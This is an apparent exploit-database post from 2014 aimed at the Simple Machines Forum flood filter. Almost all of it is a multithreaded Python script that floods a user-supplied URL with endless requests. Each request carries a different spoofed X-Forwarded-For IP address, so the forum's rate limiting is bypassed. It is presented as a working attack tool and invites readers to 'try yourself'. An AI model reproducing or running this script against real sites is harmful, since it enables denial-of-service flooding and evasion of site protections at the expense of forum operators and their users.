SMF Flood Filter Issue
Posted on 26 August 2014
# Exploit Title: SMF Incorrect Flood Filter Headers# Date: 21/08/2014# Author: Daniel Godoy# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com# Author Web: www.delincuentedigital.com.ar# Software: Simple Machine Forum # http://www.simplemachines.org# Tested on: Linux# DORK: Try yourself ;) * #!/usr/bin/python * # RemoteExecution * #Autor: Daniel Godoy A.K.A hielasangre * * import sys, threading, time, urllib2,re * print "Ingrese URL: " * url = raw_input() * a = b = c = d = 1 * count = 0 * class SMFPwner(threading.Thread): * def __init__(self, num): * threading.Thread.__init__(self) * self.num = num * def run(self): * while 1: * global a,b,c,d,count, url * data = "" * while 1: * while 1: * if d!=250: * d+=1 * else: * if c!= 250: * c+=2 * d=0 * else: * if b!=250: * c=0 * d=0 * b+=1 * else: * a+=1 * b=0 * c=0 * d=0 * head = str(a)+'.'+str(b)+'.'+str(c)+'.'+str(d) * headers = { 'X-Forwarded-For' : head } * req = urllib2.Request(url, data, headers) * f = urllib2.urlopen(req) * count += 1 * print "[ Visitando => " + url + " Por " + str(count) +" vez ]" * for i in range(3): * ta = SMFPwner(i) * ta.start() http://pastebin.com/TiZc0T05 ------------------------- Correo enviado por medio de MailMonstruo - www.mailmonstruo.com
